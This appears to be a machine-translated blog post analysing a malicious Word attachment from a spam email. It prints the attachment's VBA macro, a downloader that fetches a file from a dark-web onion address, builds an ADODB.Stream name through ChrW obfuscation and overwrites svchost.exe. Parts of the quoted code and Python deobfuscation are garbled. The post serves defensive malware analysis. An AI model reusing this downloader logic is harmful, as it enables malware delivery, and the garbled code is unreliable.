Shulou(Shulou.com)06/01 Report--

Last Monday (December 4), my friend forwarded me a spam email with a word document attached to it. We were both engaged in Xinan, so we naturally sensed a dangerous smell and had not analyzed word attachments before, so we have today's analysis.

Environment ubuntu 16.04office software: LibreOffice writer1. FBI Warning

Analysis is risky, please run it on a virtual machine, and disable word macros from running automatically before analysis

two。 Email screenshot

3. Mail analysis

You can see that the body of the email is composed of a picture and an attachment, of which we should focus on.

The doc attachment has a password, and the password is 11154. Attachment Analysis General Analysis method 4.1 generally, non-open way to analyze a word attachment, we will generally choose oletools, but this is in the case of non-encrypted word documents, after adding a password can not be extracted through oletools word document macros.

4.2 olevba extraction Macro presentation

Olevba-c xxx.doc-c: displays only the macro code in word-a: automatically analyzes whether word is suspicious

After adding the password, you can't use the general analysis method 4.3.To use olevba to extract the vba code of the document.

4.4 Open the word attachment with the autorun of macros turned off. 4.4.1 as you can see, the word document requires a password, and when you enter the password, the document will automatically open. If you have previously enabled the macro, then you will be caught after entering the password.

4.4.2 when opened, prompt that the word document contains macros

4.4.3 tempt users to enable macros

4.5 View Macro Code

You can see that there is a piece of code written by vb. From calling WinHttpReq, you can guess that the function of this word document is a downloader.

4.6Macro code analysis Step1. Visit a website of the dark net to download a file, and now you can no longer open the link to the dark net. Sub MainDim WinHttpReq As ObjectSet WinHttpReq = CreateObject ("Microsoft.XMLHTTP") WinHttpReq.Open "GET", "http://ypg7rfjvfywj7jhp.onion.link/icon.jpg", False,"username", "password" WinHttpReq.send

As shown in the following figure, use a tor browser to visit the corresponding dark net link and return a web page to show that the dark net address is invalid.

Step2. A simple confusing piece together Dim first5 As StringDim second5 As StringDim last5 As Stringfirst5 = ChrW (65) & ChrW (68) & ChrW (79) & ChrW (68) & ChrW (66) & ChrW (46) & ChrW (83) & ChrW (116C) & ChrW (101l) second5 = ChrW (97) & ChrW (109th) last5 = first5 + second5

The important part is that ChrW,ChrW in first5 and second5 converts decimal ascii values to ascii characters, so you can use python to do a conversion.

First5 = "ChrW (65) & ChrW (68) & ChrW (79) & ChrW (68) & ChrW (66) & ChrW (46) & ChrW (83) & ChrW & ChrW & ChrW (101)" second5 = "ChrW (97) & ChrW (109)" def convert_vb2py (s): first_s = s.replace ("ChrW", "chr") second_s = first_s.replace ("&") +) return second_sprint eval (convert_vb2py (first5)) + eval (convert_vb2py (second5))

In the end, we can get the value of last5 as ADODB.Stream, which is an object in vb that is used to operate with the file system.

Step 3. Save http://ypg7rfjvfywj7jhp.onion.link/icon.jpg to a local file

Xyuhjnx = WinHttpReq.responseBodyIf WinHttpReq.Status = 200ThenSet oStream = CreateObject (last5) oStream.OpenoStream.Type = Val ("1FFF") oStream.Write WinHttpReq.responseBodyDim first6 As StringDim last6 As Stringfirst6 = ChrW & ChrW last6 = first6oStream.SaveToFile Environ ("svchost.exe", Val ("2FFF") oStream.CloseEnd IfEnd Sub

The code takes the contents of icon.jpg, creates a Stream object that is written to icon.jpg, and saves it to the directory where svchost.exe is located, that is, c:\ windows\ system32\ directory, where the value of Val ("2FFF") is 2. In the SaveToFile method of adobe.stream, the second parameter represents overwriting the original file.

4.7 at this point, we have analyzed the entire macro code

In general, this is a downloader that downloads malicious code and replaces the system's svchost.exe. Some foreign security researchers have also uploaded documents without passwords to malware analysis websites. Here is one of the links. Reference link other event analysis 1 malware analysis website analysis results SaveToFIle reference

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.